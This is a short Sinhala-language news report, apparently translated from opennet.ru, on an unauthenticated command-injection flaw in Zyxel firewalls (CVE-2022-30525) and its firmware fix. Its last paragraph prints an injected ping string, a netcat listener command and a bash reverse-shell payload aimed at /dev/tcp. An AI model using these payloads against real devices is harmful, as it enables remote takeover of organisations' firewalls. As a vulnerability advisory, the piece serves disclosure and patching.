සත්‍යාපනයකින් තොරව කේත ක්‍රියාත්මක කිරීමට ඉඩ දෙන Zyxel ෆයර්වෝල් වල අවදානම

ATP, VPN සහ USG FLEX ශ්‍රේණිවල Zyxel උපාංගවල තීරණාත්මක අවදානමක් (CVE-2022-30525) හඳුනාගෙන ඇති අතර, ව්‍යවසාය තුළ ෆයර්වෝල්, IDS සහ VPN ක්‍රියාත්මක කිරීම සංවිධානය කිරීම සඳහා නිර්මාණය කර ඇති අතර, එමඟින් බාහිර ප්‍රහාරකයෙකුට කේතය ක්‍රියාත්මක කිරීමට ඉඩ සලසයි. සත්‍යාපනයකින් තොරව පරිශීලක හිමිකම් නොමැතිව උපාංගය. ප්‍රහාරයක් සිදු කිරීමට, ප්‍රහාරකයෙකුට HTTP/HTTPS ප්‍රොටෝකෝලය භාවිතයෙන් උපාංගය වෙත ඉල්ලීම් යැවීමට හැකි විය යුතුය. Zyxel විසින් ZLD 5.30 ෆර්ම්වෙයාර් යාවත්කාලීනයේ ඇති අවදානම නිරාකරණය කර ඇත. Shodan සේවාවට අනුව, HTTP/HTTPS හරහා ඉල්ලීම් පිළිගන්නා ගෝලීය ජාලයේ දැනට අවදානමට ලක්විය හැකි උපාංග 16213ක් ඇත.

සත්‍යාපනයකින් තොරව ප්‍රවේශ විය හැකි වෙබ් හසුරුවන්න /ztp/cgi-bin/handler වෙත විෙශේෂෙයන් නිර්මාණය කරන ලද විධාන යැවීම මගින් මෙහෙයුම සිදු කරනු ලබයි. Lib_wan_settings.py පුස්තකාලයේ භාවිතා කරන os.system ඇමතුම භාවිතයෙන් පද්ධතිය මත විධාන ක්‍රියාත්මක කිරීමේදී සහ setWanPortSt මෙහෙයුම සැකසීමේදී ක්‍රියාත්මක කරන විට ඉල්ලීම් පරාමිති නිසි ලෙස පිරිසිදු නොකිරීම නිසා ගැටළුව ඇතිවේ.

උදාහරණයක් ලෙස, ප්‍රහාරකයෙකුට තන්තුව පසුකර යා හැක “; පිං 192.168.1.210;" පද්ධතිය මත "ping 192.168.1.210" විධානය ක්රියාත්මක කිරීමට තුඩු දෙනු ඇත. විධාන කවචයට ප්‍රවේශය ලබා ගැනීම සඳහා, ඔබට ඔබේ පද්ධතියේ “nc -lvnp 1270” ධාවනය කළ හැකි අතර, පසුව උපාංගය වෙත ඉල්ලීමක් යැවීමෙන් ප්‍රතිලෝම සම්බන්ධතාවක් ආරම්භ කළ හැකිය; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.

මූලාශ්රය: opennet.ru

අදහස් එක් කරන්න